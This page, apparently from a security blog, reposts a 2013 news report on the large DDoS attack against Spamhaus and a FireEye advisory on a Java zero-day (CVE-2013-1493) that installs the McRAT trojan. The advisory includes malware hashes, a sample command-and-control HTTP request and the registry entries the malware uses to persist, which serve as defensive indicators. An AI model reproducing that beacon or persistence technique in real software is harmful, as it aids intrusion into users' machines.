March 27, 2013 7:40 pm

Hackers mount widespread cyber attack

By Bede McCarthy in London and Richard Waters in San Francisco

Hackers have hit a European anti-spam group with a cyber attack so large that experts say it could slow down the internet itself.
The original target was Spamhaus, which said it had been subject to large-scale distributed denial of service (DDoS) attacks for the past week. Such attacks overwhelm servers by bombarding them with spurious requests simultaneously from computers all over the internet.
According to security companies monitoring the attack, it has risen in scale from 10 gigabits per second of data to 300Gbps, making it one of the largest of its kind and about six times the size of most such incidents.
Cloudflare, a security company hired by Spamhaus to fight off the bombardment, said the attack ceased on March 21 but resumed the next day with increased power, targeting Cloudflare’s network providers in an effort to neutralise the defence.
The company said the result was that the attack moved up the chain to the so-called Tier 1 providers, who service the internet with raw bandwidth. In effect, all internet users were sharing the increased load.
“While we don’t have direct visibility into the traffic loads they saw, we have been told by one major Tier 1 provider that they saw more than 300Gbps of attack traffic related to this attack. That would make this attack one of the largest ever reported,” Cloudflare said.
Spamhaus’ volunteers maintain a list of internet addresses known to be used for spam, enabling users of its service to filter out large amounts of junk or infected email. As a result it has many enemies, and has accused one such blocked site of colluding with online criminals in eastern Europe and Russia to launch the attack.
However, the attack has failed to bring the address-blocking service offline. ““We’re up – they haven’t been able to knock us down. Our engineers are doing an immense job in keeping it up – this sort of attack would take down pretty much anything else,” Steve Linford, chief executive for Spamhaus, told the BBC in London.
Raj Samani, McAfee’s chief technology officer in Europe, said an attack of this scale was likely to affect all internet users, from consumers to small and large businesses. “We are seeing an increase in volume and sophistication of these types of attacks stemming from all parts of the world,” he said.
Kaspersky Lab, another security company, said that owing to the nature of the internet the attack would probably impede normal web services for users of other sites, not just Spamhaus. Users may experience a slow network or total unavailability of certain websites.
Although many users have experienced delays in bandwidth-hungry services such as Netflix, Thinkbroadband, a broadband consultancy in the UK, said its tests showed no evidence that internet speeds had been slower.

YAJ0: Yet Another Java Zero-Day

Through our Malware Protection Cloud (MPC), we detected a brand new Java zero-day vulnerability that was used to attack multiple customers. Specifically, we observed successful exploitation against browsers that have Java v1.6 Update 41 and Java v1.7 Update 15 installed.
Not like other popular Java vulnerabilities in which security manager can be disabled easily, this vulnerability leads to arbitrary memory read and write in JVM process. After triggering the vulnerability, exploit is looking for the memory which holds JVM internal data structure like if security manager is enabled or not, and then overwrites the chunk of memory as zero. Upon successful exploitation, it will download a McRAT executable (MD5: b6c8ede9e2153f2a1e650dfa05b59b99 as svchost.jpg) from same server hosting the JAR file and then execute it.

Figure 1. Example HTTP GET of the McRAT after the browser is successfully exploited, prior to the endpoint becoming fully compromised.

The exploit is not very reliable, as it tries to overwrite a big chunk of memory. As a result, in most cases, upon exploitation, we can still see the payload downloading, but it fails to execute and yields a JVM crash. When the McRAT successfully installs in the compromised endpoint as an EXE (MD5: 4d519bf53a8217adc4c15d15f0815993), it generates the following HTTP command and control traffic:
POST /59788582 HTTP/1.0
Content-Length: 44
Accept: text/html,application/xhtml+xml,application/xml,*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 110.XXX.55.187
Pragma: no-cache

4PdWXOD3Vlzg91Zc4PdWXOD3Vlzg91Zc4PdWXMP1RXw.
McRAT persists by writing a copy of itself as a DLL to (C:\Documents and Settings\admin\AppMgmt.dll) and performing the following registry modifications:

\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = C:\Documents and Settings\admin\AppMgmt.dll
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = %SystemRoot%\System32\appmgmts.dll
This post was intended to serve as a warning to the general public. We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in your browser until a patch has been released; alternatively, set your Java security settings to "High" and do not execute any unknown Java applets outside of your organization.
We will continue to update this blog as new information about this threat is found. FireEye would like to acknowledge and thank Hermes Bojaxhi and his team at CyberESI for their assistance in confirming this Java zero-day vulnerability.

This blog was written by FireEye researchers Darien Kindlund and Yichong Lin.
Update: Oracle assigned CVE-2013-1493 on this vulnerability.

TrackBack

TrackBack URL for this entry:
http://www.typepad.com/services/trackback/6a00d835018afd53ef017c372f3a56970b
Listed below are links to weblogs that reference YAJ0: Yet Another Java Zero-Day:

Mantra Of Security !!!

Thursday, March 28, 2013